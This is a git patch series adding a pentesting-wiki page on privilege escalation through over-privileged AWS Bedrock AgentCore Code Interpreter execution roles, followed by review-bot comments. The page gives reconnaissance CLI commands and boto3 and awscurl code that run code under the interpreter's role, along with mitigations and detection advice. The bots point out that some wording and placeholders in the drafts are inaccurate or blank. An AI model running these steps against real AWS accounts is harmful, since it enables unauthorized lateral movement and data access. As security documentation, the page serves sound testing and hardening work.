From 70738d211e8ef9a1425394d7bd579ba4e7dc9cd2 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 00:06:33 +0100 Subject: [PATCH 1/3] Revise AWS Bedrock AgentCore Code Interpreter documentation Updated the AWS Bedrock AgentCore documentation to clarify the Code Interpreter Role Pivot technique, including details on preconditions, required IAM actions, exploitation flow, and mitigation strategies. --- .../aws-bedrock-agentcore-privesc.md | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md new file mode 100644 index 000000000..3f523b975 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md 
@@ -0,0 +1,88 @@ +# AWS Bedrock AgentCore - Code Interpreter Role Pivot + +## Service + +**Amazon Bedrock AgentCore** + +## Technique Name + +**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`) + +## Why this Matters + +Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services. + +When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account. + + +## Preconditions (The Misconfiguration) + +1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs. +2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions. +3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews. + + +## Required IAM Actions + +To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions: + +* `bedrock-agentcore:StartCodeInterpreterSession` +* `bedrock-agentcore:InvokeCodeInterpreter` +* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role) + +> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. 
This creates a potential "PassRole-less" role selection edge case that should be validated in target environments. + + +## Exploitation Flow + +### 1. Reconnaissance + +Identify existing interpreters and their associated execution roles. + +```bash +aws bedrock-agentcore-control list-code-interpreters +aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id + +``` + +### 2. Session Initiation + +Start a session to gain access to the compute environment. + +```bash +aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id + +``` + +### 3. Lateral Movement / Exfiltration + +Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services. + +```python +import boto3 +# The interpreter uses the executionRoleArn automatically +s3 = boto3.client('s3') +print(s3.list_buckets()) + +``` + + +## Mitigation & Detection + +### **Prevention** + +* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy. +* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals. +* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users. + +### **Detection** + +* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals. +* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations. 
+ + +## References + +* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) +* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html) +* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) From 9f57fc71197be234430324f5dc35db435c641e07 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 11:04:17 +0100 Subject: [PATCH 2/3] Rename src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md --- .../README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename src/pentesting-cloud/aws-security/aws-privilege-escalation/{src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md => aws-bedrock-agentcore-privesc/README.md} (100%) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md similarity index 100% rename from src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md From 45573491412c93664bb78a52b2dda41ad5bc670e Mon Sep 17 00:00:00 2001 
From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 18:35:30 +0100 Subject: [PATCH 3/3] docs(aws): add AgentCore Code Interpreter role pivot privesc --- .../aws-bedrock-agentcore-privesc/README.md | 88 ------------- .../aws-bedrock-privesc/README.md | 122 ++++++++++++++++++ 2 files changed, 122 insertions(+), 88 deletions(-) delete mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md deleted file mode 100644 index 3f523b975..000000000 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md +++ /dev/null 
@@ -1,88 +0,0 @@ -# AWS Bedrock AgentCore - Code Interpreter Role Pivot - -## Service - -**Amazon Bedrock AgentCore** - -## Technique Name - -**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`) - -## Why this Matters - -Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services. - -When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account. - - -## Preconditions (The Misconfiguration) - -1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs. -2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions. -3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews. - - -## Required IAM Actions - -To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions: - -* `bedrock-agentcore:StartCodeInterpreterSession` -* `bedrock-agentcore:InvokeCodeInterpreter` -* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role) - -> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. 
This creates a potential "PassRole-less" role selection edge case that should be validated in target environments. - - -## Exploitation Flow - -### 1. Reconnaissance - -Identify existing interpreters and their associated execution roles. - -```bash -aws bedrock-agentcore-control list-code-interpreters -aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id - -``` - -### 2. Session Initiation - -Start a session to gain access to the compute environment. - -```bash -aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id - -``` - -### 3. Lateral Movement / Exfiltration - -Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services. - -```python -import boto3 -# The interpreter uses the executionRoleArn automatically -s3 = boto3.client('s3') -print(s3.list_buckets()) - -``` - - -## Mitigation & Detection - -### **Prevention** - -* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy. -* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals. -* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users. - -### **Detection** - -* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals. -* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations. 
- - -## References - -* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) -* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html) -* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md new file mode 100644 index 000000000..017d1323b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md 
@@ -0,0 +1,122 @@ +# AWS - Bedrock PrivEsc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Amazon Bedrock AgentCore + +### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot + +AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”. + +If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope). + +> [!NOTE] +> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access). +> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke. + +#### Preconditions (common misconfiguration) + +- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities). +- A user (developer/auditor/CI identity) has permissions to: + - start sessions: `bedrock-agentcore:StartCodeInterpreterSession` + - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter` +- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (lets them create a new interpreter configured with an execution role, depending on org guardrails). 
+ +#### Recon (identify custom interpreters and execution role usage) + +List interpreters (control-plane) and inspect their configuration: + +```bash +aws bedrock-agentcore-control list-code-interpreters +aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id +```` + +> The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have. + +#### Step 1 - Start a session (this returns a `sessionId`, not an interactive shell) + +```bash +SESSION_ID=$( + aws bedrock-agentcore start-code-interpreter-session \ + --code-interpreter-identifier \ + --name "arte-oussama" \ + --query sessionId \ + --output text +) + +echo "SessionId: $SESSION_ID" +``` + +#### Step 2 - Invoke code execution (Boto3 or signed HTTPS) + +There is **no interactive python shell** from `start-code-interpreter-session`. Execution happens via **InvokeCodeInterpreter**. + +**Option A - Boto3 example (execute Python + verify identity):** + +```python +import boto3 + +client = boto3.client("bedrock-agentcore", region_name="") + +# Execute python inside the Code Interpreter session +resp = client.invoke_code_interpreter( + codeInterpreterIdentifier="", + sessionId="", + name="executeCode", + arguments={ + "language": "python", + "code": "import boto3; print(boto3.client('sts').get_caller_identity())" + } +) + +# Response is streamed; print events for visibility +for event in resp.get("stream", []): + print(event) +``` + +If the interpreter is configured with an execution role, the `sts:GetCallerIdentity()` output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot. 
+ +**Option B - Signed HTTPS call (awscurl):** + +```bash +awscurl -X POST \ + "https://bedrock-agentcore..amazonaws.com/code-interpreters//tools/invoke" \ + -H "Content-Type: application/json" \ + -H "Accept: application/json" \ + -H "x-amzn-code-interpreter-session-id: " \ + --service bedrock-agentcore \ + --region \ + -d '{ + "name": "executeCode", + "arguments": { + "language": "python", + "code": "print(\"Hello from AgentCore\")" + } + }' +``` + +#### Impact + +* **Lateral movement** into whatever AWS access the interpreter execution role has. +* **Privilege escalation** if the interpreter execution role is more privileged than the caller. +* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration). + +#### Mitigations / Hardening + +* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles). +* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions. +* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary). +* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation. 
+ +## References + +- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/) +- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/) +- [AWS CLI: create-code-interpreter (`--execution-role-arn`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) +- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) +- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) +- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) + + +{{#include ../../../../banners/hacktricks-training.md}} +
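Review bot: In the [PATCH 1/3] hunk `@@ -0,0 +1,88 @@`, the "Why this Matters" paragraph calls the `executionRoleArn` a "service-linked role", which contradicts the rest of the file: the same hunk describes a role a developer grants permissions to and says `CreateCodeInterpreter` works "with a pre-existing role", whereas a service-linked role is predefined by the service and its policy cannot be widened by a developer. Suggest "execution role" throughout. Two further points in the same hunk: "Required IAM Actions" says "one or more of" although the Exploitation Flow uses both `StartCodeInterpreterSession` and `InvokeCodeInterpreter`, and the Identity Scoping bullet names `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` without saying which actions support those condition keys, so a reader cannot tell whether the control applies to the code interpreter actions at all; cite the relevant row of the Service Authorization page already linked under References.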
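Review bot: The `@@ -1,88 +0,0 @@` hunk in [PATCH 3/3] deletes in full the file that [PATCH 1/3] created and [PATCH 2/3] renamed, so the series should be squashed into one commit that only adds `aws-bedrock-privesc/README.md`. As it stands, the history keeps a path with a duplicated `src/pentesting-cloud/aws-security` segment and a space before `/aws-bedrock-agentcore-privesc.md`, plus a first draft that disagrees with the final text (for example `--code-interpreter-id` versus `--code-interpreter-identifier` on `start-code-interpreter-session`). The deletion also drops the permission-boundary bullet and the "Credential Usage" detection bullet, and the replacement file carries no equivalent; either port them or say in the commit message why they were removed.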
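Review bot: In the `@@ -0,0 +1,122 @@` hunk of [PATCH 3/3], Step 1 hard-codes `--name "arte-oussama"`, a personal identifier that readers will copy verbatim into their own session names; replace it with a neutral placeholder. The other placeholders are empty as shown (`--code-interpreter-identifier \`, `region_name=""`, `sessionId=""`, and `bedrock-agentcore..amazonaws.com/code-interpreters//tools/invoke`), so a reader cannot tell what to fill in; if they were written in angle brackets, use a form that survives rendering. The Recon block opens with three backticks and closes with four. The optional `CreateCodeInterpreter` bullet says "depending on org guardrails" but no longer states whether `iam:PassRole` on the execution role is required, which is the fact a defender needs in order to decide where to place the control; state it with a citation or mark it as unverified.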